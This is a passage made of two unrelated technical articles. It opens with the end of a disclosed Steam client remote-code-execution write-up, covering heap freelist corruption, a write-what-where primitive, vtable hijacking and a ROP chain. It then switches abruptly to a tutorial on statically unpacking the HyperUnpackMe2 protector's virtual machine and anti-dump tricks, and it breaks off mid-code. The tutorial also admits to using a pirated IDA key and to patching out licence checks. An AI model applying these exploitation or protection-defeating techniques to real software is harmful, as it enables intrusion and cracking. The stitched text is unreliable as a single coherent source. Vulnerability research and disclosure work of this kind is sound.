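    static void *chunk_alloc(allocator *a)
    {
        void *chunk = a->freelist_head;
        if (chunk != NULL)
            a->freelist_head = *(void **)chunk;   /* next_free_block becomes head */
        return chunk;
    }

    static void chunk_free(allocator *a, void *chunk)
    {
        *(void **)chunk = a->freelist_head;       /* old head into next_free_block */
        a->freelist_head = chunk;
    }

Corrupting the first 4 bytes of an adjacent free chunk therefore redirects a later chunk_alloc to an attacker-chosen address, which is the basis of the write primitive described next.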

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (e.g. CWorkItemNetFilterEncrypt, CWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg-lightly-commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me using the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key][arbitrary data]
                        ^ pointer points here
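A sketch of that initialization scan in C (function and variable names invented; the real routine lives in the VM harness):

    #include <stdint.h>
    #include <stddef.h>
    #include <string.h>

    typedef struct { uint8_t *ptr; uint32_t key; } TH_keyed_mem;

    /* Scan the VM data for '$$$$' tags and record (key, pointer) pairs:
     * the tag dword is followed by the key dword, and the pointer is taken
     * as the address of the data that follows the key. */
    static size_t build_keyed_mem(uint8_t *vm_data, size_t len,
                                  TH_keyed_mem *out, size_t max_entries)
    {
        size_t n = 0;
        for (size_t i = 0; n < max_entries && i + 8 <= len; i++) {
            if (memcmp(vm_data + i, "$$$$", 4) == 0) {
                memcpy(&out[n].key, vm_data + i + 4, 4);
                out[n].ptr = vm_data + i + 8;      /* data starts after the key */
                n++;
            }
        }
        return n;
    }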

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.
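Concretely, once the source, destination and size are pulled out of such a sequence, undoing one stolen-function copy is a single memcpy over the raw file image. The following is only a sketch of that idea: va_to_offset() is a hypothetical helper (it would walk the PE section headers to translate a virtual address into a file offset), not something from the packer or from IDA.

    #include <string.h>

    /* assumed helper: translate a virtual address into a raw file offset by
       walking the PE section headers (not shown here) */
    unsigned long va_to_offset(unsigned char *image, unsigned long va);

    /* copy a stolen function back over its original location; the arguments
       are the constants recovered above: src_va = 0x1038A82, dst_va = 0x1001B9A,
       size = 0xB7 for UpdateStatusBar */
    void unsteal_function(unsigned char *image, unsigned long src_va,
                          unsigned long dst_va, unsigned long size)
    {
        memcpy(image + va_to_offset(image, dst_va),
               image + va_to_offset(image, src_va),
               size);
    }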

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?
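To make the greatest-lower-bound lookup concrete, here is a minimal C sketch using the example displacements above. The table and function names are mine, not the packer's; in the real unpacker the table is filled in while walking the x86_memcpy call sites.

    struct stolen { unsigned long disp, va; };

    /* sorted by displacement; values taken from the example above */
    static struct stolen g_map[] = {
        { 0x000, 0x1001B9A },
        { 0x0B7, 0x1001EEF },
        { 0x11D, 0x100696A },
    };

    /* map "allocated memory + disp" back to an address in the original binary
       by finding the greatest lower bound in the displacement set */
    unsigned long disp_to_va(unsigned long disp)
    {
        int i;
        for (i = (int)(sizeof(g_map) / sizeof(g_map[0])) - 1; i >= 0; i--)
            if (g_map[i].disp <= disp)
                return g_map[i].va + (disp - g_map[i].disp);
        return 0; /* not a stolen-function displacement */
    }

For displacement C0h this returns 1001EEFh + 9h, matching the hand calculation above.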

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F’s and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 is replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.
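As a sketch of what "fixing the jumps ourselves" means in practice: given the address of the E9 00 00 00 00 instruction and its intended target (10019DFh and 1001AE1h in the listing above), we write the rel32 directly and never involve the allocated stub. va_to_offset() is the same hypothetical helper as before.

    #include <string.h>

    /* patch one long jmp in the raw image so it goes straight to its target */
    void fix_jmp(unsigned char *image, unsigned long jmp_va, unsigned long target_va)
    {
        unsigned long off = va_to_offset(image, jmp_va);
        unsigned long rel = target_va - (jmp_va + 5);   /* displacement is measured
                                                           from the end of the jmp */
        image[off] = 0xE9;                              /* long jmp opcode */
        memcpy(image + off + 1, &rel, 4);               /* little-endian rel32 */
    }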

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion to the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.
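For reference, the same idea expressed in C: walk the export directory of the (copied) module and hash each exported name until the requested hash matches. The PE structure walk below uses the standard winnt.h definitions; the hash function itself is only a placeholder (a common ROR-13 accumulator), since the packer uses its own.

    #include <windows.h>

    /* placeholder hash -- the packer's real hash function differs */
    static DWORD hash_name(const char *s)
    {
        DWORD h = 0;
        while (*s) { h = (h >> 13) | (h << 19); h += (unsigned char)*s++; }
        return h;
    }

    /* base points at the copied DLL body (the pseudo-HMODULE) */
    FARPROC get_proc_by_hash(BYTE *base, DWORD hash)
    {
        IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + ((IMAGE_DOS_HEADER *)base)->e_lfanew);
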